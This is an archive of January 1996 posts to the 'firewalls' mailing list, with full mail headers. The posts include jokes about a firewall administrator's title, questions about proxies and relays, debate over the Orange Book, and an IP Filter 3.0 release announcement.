Sun, 14 Jan 1996 17:13:46 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma009284; Sun Jan 14 17:13:16 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA14412; Sun, 14 Jan 1996 17:12:00 +0100 Message-Id: <9601141612.AA14412@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA08049; Sun, 14 Jan 96 17:11:59 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA07587; Sun, 14 Jan 96 17:11:58 +0100 From: Rolf Weber Subject: Re: "Title for Firewall Admin? To: firewalls@greatcircle.com (firewalls) Date: Sun, 14 Jan 1996 17:11:57 +0100 (MEZ) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? steamroller. it came in mind when i heard there is a firewall product called "catapult"... -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-113 | can't make me happy. From firewalls-owner Sun Jan 14 08:55:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA01777 for firewalls-outgoing; Sun, 14 Jan 1996 08:48:32 -0800 (PST) Received: from ns1.eds.com (ns1.eds.com [192.85.154.78]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA01772 for ; Sun, 14 Jan 1996 08:48:29 -0800 (PST) Received: by ns1.eds.com (hello) id LAA01702; Sun, 14 Jan 1996 11:47:32 -0500 Received: by nnsa.eds.com (hello) id LAA06467; Sun, 14 Jan 1996 11:47:02 -0500 Message-Id: <199601141647.LAA06467@nnsa.eds.com> Received: by sys1hp03 (1.37.109.16/16.2) id AA012657143; Sun, 14 Jan 1996 11:32:23 -0500 From: Mark E Dyer Subject: Re: "Title for Firewall Admin? To: Firewalls@GreatCircle.COM Date: Sun, 14 Jan 1996 11:32:23 EST In-Reply-To: <199601122310.PAA12337@miles.greatcircle.com>; from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 3:10 pm X-Mailer: Elm [revision: 109.14] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think Fire Eater or Fire Walker have possibilities From firewalls-owner Sun Jan 14 09:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02487 for firewalls-outgoing; Sun, 14 Jan 1996 09:25:16 -0800 (PST) Received: from atc.boeing.com (atc.boeing.com [130.42.28.80]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA02482 for ; Sun, 14 Jan 1996 09:25:12 -0800 (PST) Received: by atc.boeing.com (5.65/splinter.boeing.com) id AA24201; Sun, 14 Jan 1996 09:28:11 -0800 Received: by igate2.he.boeing.com (5.57/DEC-Ultrix/4.3) id AA07869; Sun, 14 Jan 96 12:30:45 -0500 Received: by helios.he.boeing.com (4.1/SMI-4.1) id AA24032; Sun, 14 Jan 96 12:21:39 EST Date: Sun, 14 Jan 1996 12:21:37 -0500 (EST) From: "Allan R. Hoegg" X-Sender: bvn011@helios To: Rolf Weber Cc: firewalls Subject: Re: "Title for Firewall Admin? In-Reply-To: <9601141612.AA14412@spibm02> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sacrificial Lamb would be most appropriate On Sun, 14 Jan 1996, Rolf Weber wrote: > Date: Sun, 14 Jan 1996 17:11:57 +0100 (MEZ) > From: Rolf Weber > To: firewalls > Subject: Re: "Title for Firewall Admin? > > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > steamroller. > it came in mind when i heard there is a firewall product > called "catapult"... > -- > ----------------------------------------- > Rolf Weber | All I ask is a chance > IEZ AG D-64625 Bensheim | to prove that money > ++49-6251-1309-113 | can't make me happy. > __\/__ . / ^ _ \ . |\| (o)(o) |/| #-.OOOo----oo----oOOO.--------# # A. R. Hoegg # # NADDSS 610-591-7091 # # Boeing Helicopters # # The more I learn, the # # less I know. # # Pretty soon I'll know # # everything about nothing! # # :-) :-) # #____________Oooo.____________# .oooO ( ) ( ) ) / \ ( (_/ \_) From firewalls-owner Sun Jan 14 10:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA04404 for firewalls-outgoing; Sun, 14 Jan 1996 10:29:44 -0800 (PST) Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA04399 for ; Sun, 14 Jan 1996 10:29:39 -0800 (PST) Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA76 for ; Sun, 14 Jan 1996 13:27:50 -0500 Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BAE2E8.74147DE0@rwcooper.rcooper.the-wire.com>; Mon, 15 Jan 1996 01:26:11 -0500 Message-ID: <01BAE2E8.74147DE0@rwcooper.rcooper.the-wire.com> From: Russ Cooper To: "'Firewalls'" Subject: RE: "Title for Firewall Admin? Date: Mon, 15 Jan 1996 01:26:08 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk How 'bout "Toll Booth Attendant" ... After all, its generally accepted that you have to pay to get certain services through your gate, non? (i.e. RealAudio!) or "Corporate Access Paladin" ... then you can be called "Cap", as in "Aye, aye, Cap" or "Sentinel at " ... reminded me of the Oracle at Delphi Cheers, Russ Cooper Sr. Internet Integration Engineer SHL/Computer Innovations rcooper@the-wire.com -- rwcooper@shl.com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Sun Jan 14 12:25:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA09481 for firewalls-outgoing; Sun, 14 Jan 1996 12:13:40 -0800 (PST) Received: from picard.nib.com ([205.136.146.102]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA09475 for ; Sun, 14 Jan 1996 12:13:36 -0800 (PST) Received: from picard.nib.com (jclark@picard.nib.com [205.136.146.102]) by picard.nib.com (8.6.9/8.6.9) with SMTP id PAA01739; Sun, 14 Jan 1996 15:30:38 -0500 Date: Sun, 14 Jan 1996 15:30:37 -0500 (EST) From: "Jay R. Clark" To: Russ Cooper cc: "'Firewalls'" Subject: RE: "Title for Firewall Admin? In-Reply-To: <01BAE2E8.74147DE0@rwcooper.rcooper.the-wire.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > "Corporate Access Paladin" ... then you can be called "Cap", as in "Aye, > aye, Cap" > or > "Sentinel at " ... reminded me of the Oracle at > Delphi Given managements proclivity to often confuse the message with the messenger, how 'bout "roadkill" as in on the information superhighway From firewalls-owner Sun Jan 14 12:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA10694 for firewalls-outgoing; Sun, 14 Jan 1996 12:27:44 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA10673 for ; Sun, 14 Jan 1996 12:27:36 -0800 (PST) Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id UAA08325; Sun, 14 Jan 1996 20:26:40 GMT Date: Sun, 14 Jan 1996 20:26:40 GMT Message-Id: <199601142026.UAA08325@smtp-gw01.ny.us.ibm.net> Received: from slip139-92-18-243.emea.ibm.net(139.92.18.243) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaT3YGDM; Sun Jan 14 20:26:34 1996 X-Sender: avivi@pop03.ca.us.ibm.net (Unverified) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: avivi@ibm.net (Avishai Avivi) Subject: TS and stuff Cc: avivi@ibm.net X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Guys, With-all-due-respect I think we should drop the discussion on all of the various security levels there are out there... I truly believe (from personal experience) that the less you discuss these things, the better off you all are... Besides I think the networking world has enough acronyms to keep us guessing at. :-o I also happen to agree with the line in the movie "Snickers" - Too Many Secrets. Knowing and/or dealing with classified information has nothing glorious about it, and I found that it contributed greatly to my receeding hairline.. :-( Does anyone know of any good guidelines on how to build proxies, or where one might be able to get his hands on a skeleton proxy, that is custimizable enough? Also I have a problem some of you mentioned... While I'm the "cop" at my organization as far as security is concerned (also known as "The anal retentive networking dude") I do have superiors who do not understand what is wrong in allowing rsh and such between segments (We are really paranoid). So I took a source for rsh, and modified it a bit to include some security oriented features (such as checking the username against a list of autorized commands). But I think I'm probably trying to re-invent the wheel. Does any of know of a source of secured services? For now, -Avishai Regards, -Avishai ---------------------------------------------------------------------------- --------------------- Avishai Avivi avivi@ibm.net ---------------------------------------------------------------------------- --------------------- - Life is pain, anyone telling you otherwise is either lying or trying to sell you something. From firewalls-owner Sun Jan 14 13:25:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA15229 for firewalls-outgoing; Sun, 14 Jan 1996 13:16:19 -0800 (PST) Received: from lokkur.dexter.mi.us (dexter-gw.dexter.msen.com [148.59.2.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA15201 for ; Sun, 14 Jan 1996 13:16:11 -0800 (PST) Received: (scs@localhost) by lokkur.dexter.mi.us (8.6.12/8.6.5) id QAA20882; Sun, 14 Jan 1996 16:12:12 -0500 To: firewalls@GreatCircle.COM Path: lokkur.dexter.mi.us!not-for-mail From: scs@lokkur.dexter.mi.us (Steve Simmons) Newsgroups: local.firewalls Subject: Re: "Title for Firewall Admin? Date: 14 Jan 1996 16:12:11 -0500 Organization: Inland Sea Lines: 5 Distribution: local Message-ID: <4dbrjb$kcf@lokkur.dexter.mi.us> References: <9601121758.ZM6279@toolbox.rutgers.edu> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk `Sir.' `Mr. Sir' on good days. -- "Home pages are the pet rock of the 90s. We all have them, we all think they're very cute. But in a few years we're going to look back and be pretty embarrassed." -- Tony Shepps From firewalls-owner Sun Jan 14 14:25:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA21147 for firewalls-outgoing; Sun, 14 Jan 1996 14:13:43 -0800 (PST) Received: from hephaestus.icorp.net (hephaestus.in.icorp.net [206.104.128.226]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA21126 for ; Sun, 14 Jan 1996 14:13:37 -0800 (PST) Received: by hephaestus.icorp.net (Smail3.1.29.1 #8) id m0tbafL-000LyhC; Mon, 15 Jan 96 04:12 GMT-6 Message-Id: From: ewieling@hephaestus.icorp.net (Eric Wieling) Subject: TCP and UDP relay software. To: Firewalls@GreatCircle.COM Date: Mon, 15 Jan 1996 04:12:43 +0600 (GMT-6) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our network is divided into several segments, none are considered "trusted". I am looking for a daemon that I can run on the firewall that can take incoming TCP connections or UDP datagrams and forward them to a prespecified host. Mostly I want users on several of the segment to be able to telnet to some port, and have the connection relayed to an outside service such as Lexus/Nexus, or WestLaw. I have searched high and low and simply cannot find such software. I understand that the application for this is rather limited. People tend to want to be able to telnet to any host they want. I could use some SOCKS aware telnet program I suppose, but there don't seem to be many SOCKS aware telnet clients for MS-Windows. Regards, Eric -- Eric Wieling Network Operations Center Inter Commerce Corporation From firewalls-owner Sun Jan 14 16:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA02773 for firewalls-outgoing; Sun, 14 Jan 1996 16:36:59 -0800 (PST) Received: from linknet.kitsap.lib.wa.us (linknet.kitsap.lib.wa.us [198.187.135.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA02768 for ; Sun, 14 Jan 1996 16:36:54 -0800 (PST) Received: (from jpaine@localhost) by linknet.kitsap.lib.wa.us (8.6.12/8.6.9) id QAA04344; Sun, 14 Jan 1996 16:34:45 -0800 Date: Sun, 14 Jan 1996 16:34:43 -0800 (PST) From: john paine To: Rolf Weber cc: firewalls Subject: Re: "Title for Firewall Admin? In-Reply-To: <9601141612.AA14412@spibm02> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 Jan 1996, Rolf Weber wrote: > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > steamroller. How about pyromancer? From firewalls-owner Sun Jan 14 17:25:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA07014 for firewalls-outgoing; Sun, 14 Jan 1996 17:20:31 -0800 (PST) Received: from druid.reston.mci.net (druid.Reston.mci.net [166.45.1.38]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA07000 for ; Sun, 14 Jan 1996 17:20:23 -0800 (PST) Received: from ddrew.reston.mci.net (ddrew.Reston.mci.net [204.70.130.71]) by druid.reston.mci.net (8.6.12/8.6.6) with SMTP id UAA03874; Sun, 14 Jan 1996 20:17:38 -0500 Date: Sun, 14 Jan 1996 20:17:38 -0500 Message-Id: <199601150117.UAA03874@druid.reston.mci.net> X-Sender: ddrew@166.45.1.38 X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: john paine , Rolf Weber From: Dale Drew Subject: Re: "Title for Firewall Admin? Cc: firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've resisted the urge long enough to contribute to a fluff post. I've always favored "Packet Cop". At 04:34 PM 1/14/96 -0800, john paine wrote: > > >On Sun, 14 Jan 1996, Rolf Weber wrote: > >> > The mail administrator is "postmaster" >> > The web server admin is "webmaster" >> > Is there such a title for a firewall administrator? >> >> steamroller. > > How about pyromancer? > =============================================================== Dale Drew MCI Telecommunications Manager internetMCI Security Engineering Voice: 703/715-7058 Internet: ddrew@mci.net Fax: 703/715-7066 MCIMAIL: Dale_Drew/644-3335 From firewalls-owner Sun Jan 14 18:31:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA10307 for firewalls-outgoing; Sun, 14 Jan 1996 17:56:16 -0800 (PST) Received: from grizzly.ucla.edu (grizzly.ucla.edu [164.67.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA15697 for ; Wed, 10 Jan 1996 16:35:26 -0800 (PST) Received: from UNEX.UCLA.EDU ([128.97.218.2]) by grizzly.ucla.edu (8.6.9/8.6.9) with SMTP id QAA34098 for ; Wed, 10 Jan 1996 16:26:02 -0800 Received: from Microsoft Mail (PU Serial #1550) by UNEX.UCLA.EDU (PostalUnion/SMTP(tm) v2.1.8d for Windows NT(tm)) id AA-1996Jan10.162300.1550.44488; Wed, 10 Jan 1996 16:28:15 -0800 From: BGoodin@UNEX.UCLA.EDU (Goodin, Bill) To: firewalls@greatcircle.com (List-Security firewalls) Message-ID: <1996Jan10.162300.1550.44488@UNEX.UCLA.EDU> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: UCLA Extension - contact Postmaster@unex.ucla.edu for problems. Date: Wed, 10 Jan 1996 16:28:15 -0800 Subject: UCLA Short Course on "Network and Comput Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On April 16-19, 1996, UCLA Extension will present the short course, "Network and Computer Security: Principles and Applications", on the UCLA campus in Los Angeles. The instructors are Cristi Garvey, MS, Illustra Information Technologies; Thomas Haigh, PhD, Secure Computing Corp; Stephen Kent, PhD, Bolt Beranek and Newman; and Amy Wu, MS, TRW. The overall objective of this course is to present a summary of the current state of practice in trust technology with an emphasis on network security technology. Almost every commercial and government system fielded today has to address some aspect of security and privacy. Yet computer security technology increasingly lags information technology. While there are numerous government-endorsed products on the Evaluated Products List, these trusted products do not necessarily deal with issues germane to the commercial sector. Nor do they offer much variety in their solutions. Even when the operating system, the database management system, and the network have been selected from the evaluated products based on government regulations (such as TCSEC, TNI and TDI), the composite system may or may not be secure because trusted systems cannot always be interconnected to produce a larger system that is secure. With the recent explosion in telecommunications technology, the many network offerings alone present a challenge to the system architect. Understanding network security protocols and functionality and how to use them effectively to design secure systems is essential in today's information environment. This course presents an overview of the security products and technology available today, along with an in-depth look at network security principles and protocol standards. A key element of many systems today is the need for a network architecture often supported by one or more firewall products. The lectures present various network security architectures, implementation alternatives, and ways to protect your system against malicious code attacks. The course also looks at what the Defense Information Systems Agency is doing to address security needs in the government. The course fee is $1395, which includes extensive course materials. For additional information and a complete course description, please contact Marcus Hennessy at: (310) 825-1047 (310) 206-2815 fax mhenness@unex.ucla.edu From firewalls-owner Sun Jan 14 21:25:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA01666 for firewalls-outgoing; Sun, 14 Jan 1996 21:21:46 -0800 (PST) Received: from uni.ins.com (uni.ins.com [199.0.193.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA01634 for ; Sun, 14 Jan 1996 21:21:37 -0800 (PST) Received: from markpc.ins.com (markpc.ins.com [199.0.193.183]) by uni.ins.com (8.6.12/8.6.12) with SMTP id VAA12606; Sun, 14 Jan 1996 21:20:25 -0800 Date: Sun, 14 Jan 1996 21:20:25 -0800 Message-Id: <199601150520.VAA12606@uni.ins.com> X-Sender: kadrich@uni.ins.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Warren Moore , firewalls-digest From: "Mark S. Kadrich" Subject: Re: A1 Systems? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I beleive that the rainbow series serves it purpose by defining what a 'perfect' system would behave like. We must keep in mind that this definition gives us a method to objectivly (supposedly:) describe relative strength of compared systems. A stake in the ground if you will. Creeping Featurism is a fact of commercial computing. By knowing what a 'secure' system looks like we can maintain our objectivity and judge a product by it's capabilities as well as it's liabilities. BTW, I thought part of our business _was_ assuance. The assurance of people, as well as cats...;-) mark At 08:38 AM 12/1/95, Warren Moore wrote: >My mailer thinks mjr said: > >> There's no need to -- you already explained (more tersely than >>I did) the problem with the orange book earlier on in your comments. >> >> It's not about features, it's about assurance. >> Commercial computing is about features (represented as functionality) >> Therefore orange book is irrelevant to commercial computing. >> > >With apologies to Marcus' cats (and my own), Isn't this like saying > > ...Owning Cats... > > Isn't about petting, it's about mousing. > Feeling good is about petting (represented as purrs) > Therefore owning cats is irrelevant to feeling good? > >Not even considering that you might be up to your fanny in mice, neither >Marcus' or my logical construct is valid...because the initial premise is >invalid on its face. A ne B, A eq C; D eq A; therefore A ne/or is irrelevant >to C doesn't work unless A is *always* not equal to B, and A is *always* equal >to C. Perhaps owning cats is irrelevant to feeling good, but it doesn't hurt. >Actually, I partially agree with Marcus in that the Orange Book is *largely* >irrelevant to commercial computing...but the last time I looked, *largely* >doesn't mean *totally.* As a starting point, the rainbow series beats most >things available to us. Of course, if confidentiality and assurance aren't >part of the picture, why are we all wasting our time reading this list and sell >ing security in one form or another? > >Warren S. Moore, CISSP >Information Security Specialist >Cincinnati Bell Information Systems Inc. > > ****************************************************************** Mark S. Kadrich, Managing Consultant, International Network Services "The Power of Operable Networks" Voice @ 415-254-4225, Page @ 1-800-514-0355 /\ e-mail @ kadrich@uni.ins.com ( ) Information security is a process, not a solution. ****************************************************************** From firewalls-owner Mon Jan 15 00:10:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA17067 for firewalls-outgoing; Mon, 15 Jan 1996 00:07:11 -0800 (PST) Received: from iez.com ([194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA17062 for ; Mon, 15 Jan 1996 00:07:05 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA07618; Mon, 15 Jan 1996 09:06:27 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma007104; Mon Jan 15 09:06:02 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA16848; Mon, 15 Jan 1996 09:05:16 +0100 Message-Id: <9601150805.AA16848@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA09433; Mon, 15 Jan 96 09:05:14 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA09766; Mon, 15 Jan 96 09:05:13 +0100 From: Rolf Weber Subject: Re: Linux as a firewall To: shaver@neon.ingenia.com (Mike Shaver) Date: Mon, 15 Jan 1996 09:05:12 +0100 (MEZ) Cc: firewalls@greatcircle.com (firewalls) In-Reply-To: <199601131716.MAA10961@neon.ingenia.com> from "Mike Shaver" at Jan 13, 96 12:16:11 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > Ideally, in our situation, the > > bastion host would be the firewall, the WWW server, the ftp server, the > > Usenet news server, etc... Is this completely unrealistic? > > It's quite realistic... I did it last week. =) > i think there are 2 main reasons to build an application level firewall: 1. to encrease security 2. to connect a net with non-registered addresses. if a site has only one registered IP-address, proxies are an absolutely need. but i really doubt that a site with a configuration as described above would use a firewall at all, if there were not the must of reason 2. rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-113 | can't make me happy. From firewalls-owner Mon Jan 15 01:40:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA21869 for firewalls-outgoing; Mon, 15 Jan 1996 01:35:10 -0800 (PST) Received: from whirlwind.momentum.com.au (whirlwind.momentum.com.au [203.2.238.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA21864 for ; Mon, 15 Jan 1996 01:34:52 -0800 (PST) Received: (from uucp@localhost) by whirlwind.momentum.com.au (8.6.12/8.6.12) id RAA23147 for ; Mon, 15 Jan 1996 17:33:35 +0800 Received: from aristoi.momentum.com.au(203.2.238.138) by whirlwind via smap (V1.3mjr) id sma023145; Mon Jan 15 17:33:29 1996 X-Sender: todd@mailhost.momentum.com.au Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 15 Jan 1996 17:34:21 +0800 To: Firewalls@GreatCircle.COM From: todd@momentum.com.au (Todd Hooper) Subject: RE: Linux as a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Woods writes: >OK, let's nip this in the bud right here. I see an OS war coming... Agreed 100%. I didn't make my point clearly enough - regardless of the operating system, hardware, software or the phase of the moon - you need to analyse all the costs and benefits of your firewall system before putting down your money. The fact that any part of this system may or may not be free/cheap/expensive is part of, but not the complete analysis. One organisation is always going to have very different requirements to another. Only the organisation themselves can decide exactly what they are looking for. I was pointing out some _possible_ areas of concern. 99.9% uptime, mission critical availability and a team of engineers available 24 hours a day may not be an issue for the firewall at the local community college. However, they are the only people who have the information to decide that, not us. >This is not directed at Ed, or Todd, or anyone specific; just that we >don't need a "My OS is better than your OS" thing happening here. Absolutely...it is nowhere near as much fun as listening to 'My Z class security clearance is higher than your Captain Crunch decoder ring' ;-) Todd -- Todd Hooper Internet : todd@momentum.com.au Momentum Pty Ltd Phone : 09 380 4372 Western Australia Fax : 09 380 4371 From firewalls-owner Mon Jan 15 01:55:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA21636 for firewalls-outgoing; Mon, 15 Jan 1996 01:29:45 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA21614 for ; Mon, 15 Jan 1996 01:29:36 -0800 (PST) Message-Id: <199601150929.BAA21614@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA088058167; Mon, 15 Jan 1996 20:29:27 +1100 From: Darren Reed Subject: IP Filter version 3.0 (fwd) To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Mon, 15 Jan 1996 20:29:27 +1100 (EDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IP Filter version 3.0 Version 3.0 of introduces the following features to IP Filter: * Network Address Translation (NAT) Rules (although primitive at this stage) for rewriting the source address of an IP packet can be constructed for packets outbound on an Interface. Packets coming back in the same interface and which are found to require "unmapping" are mapped back to the original IP #. * maintains "state" information for TCP/UDP/ICMP packet flows For any defined filter rule, the filter can be told to "keep state", saving information specific to that packet which would be required for packets passing in the opposite direction to match and. For TCP packets, sequence/ack numbers are also stored so that only packets falling inside the window will be passed on (this protects against "stealth scanning"). A list of packet flows can be generated, along with performance stats. * maintains "state" information for individual IP fragments By using "keep frags", a packet which is fragmented and is the first fragment, will have its "pass/block" result recorded, so that further fragments which match the first are recognised. A list of first fragments can be retrieved, as well as performance statistics. * byte accounting Another pair of filter lists has been included with the prime intention of counting bytes of all packets that match, in addition to the number of packets which actually match. * Solaris 2.4 / Solaris 2.5 Port IP Filter has now been ported to Solaris 2.4/2.5, including Solaris x86. When loaded, it will attempted to attach itself to all interfaces, including ones brought up dynamically (ie PPP), and will try to dynamically remove references to devices which no longer exist. Manual intervention can be imposed, if required, to help sync IP Filter with reality. * ipsend split into ipsend, ipresend and iptest A file of machines which can be crashed (ie don't test favourably :) with iptest is included (see ip_fil3.0.1/ipsend/Crashable). Updates to this are appreciated :-) * ipsd (IP Port Scan Dectector) is included in the package * regression testing was fixed up to require less data files * all source code distribution, with patch already applied to stop iptest crashing SunOS 4.1/FreeBSD (bug in overlapping fragment dequeing). URL's: http://coombs.anu.edu.au/~avalon/ip-filter.html ftp://coombs.anu.edu.au/pub/net/kernel/ip_fil3.0.1.tar.gz Darren From firewalls-owner Mon Jan 15 02:25:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA24418 for firewalls-outgoing; Mon, 15 Jan 1996 02:10:59 -0800 (PST) Received: from dxmint.cern.ch (dxmint.cern.ch [128.141.1.113]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA24377 for ; Mon, 15 Jan 1996 02:10:42 -0800 (PST) From: gamble@dxcoms.cern.ch Received: from dxcoms.cern.ch by dxmint.cern.ch id AA05553; Mon, 15 Jan 1996 11:09:43 +0100 Received: from localhost.cern.ch by dxcoms.cern.ch; (5.65v3.0/1.1.8.2/28Jul95-0949AM) id AA10041; Mon, 15 Jan 1996 11:09:43 +0100 Message-Id: <9601151009.AA10041@dxcoms.cern.ch> To: firewalls@GreatCircle.COM Cc: gamble@dxcoms.cern.ch Subject: Re: "Title for Firewall Admin? In-Reply-To: Your message of "Sat, 13 Jan 96 07:31:30 +0100." <9601130631.AA23705@dxmint.cern.ch> Date: Mon, 15 Jan 96 11:09:43 +0100 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? If this is for an E-mail contact address then (IMHO) it should be "cert" Sorry to keep this topic going .... John. From firewalls-owner Mon Jan 15 02:40:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA25993 for firewalls-outgoing; Mon, 15 Jan 1996 02:30:30 -0800 (PST) Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA25960 for ; Mon, 15 Jan 1996 02:30:12 -0800 (PST) Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA04959; Mon, 15 Jan 1996 11:29:22 +0200 Received: from AHQP14 ([155.132.120.211]) by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AA06477; Mon, 15 Jan 96 11:31:42 +0100 Message-Id: <9601151031.AA06477@istans.ansf.alcatel.fr> Comments: Authenticated sender is From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Mon, 15 Jan 1996 11:35:48 +0100 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: Internet-access from Novell Reply-To: Kare.Presttun@ansf.alcatel.fr X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > From: avos@kpmg.nl (Arjan Vos) > Date: Sun, 14 Jan 1996 11:12:21 +0100 > Subject: Internet-access from Novell > > A client of mine wishes to offer access to the Internet to her employees > (circa 50 employees). The company uses a Novell Netware 4 network with > Netscape 2.0 installed and they are thinking about using Lan Workplace for > the TCP/IP stack. Arjan, You may want to take a look at Novix from Firefox. http://www.firefox.com/ Regards, Kare ---------------------------------------------------------- | Kare Presttun Alcanet International | | Tel: +33 1 4058 5614 33, rue Emeriau | | Fax: +33 1 4058 5945 F-75015 Paris | | Kare.Presttun@ansf.alcatel.fr FRANCE | From firewalls-owner Mon Jan 15 05:40:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id 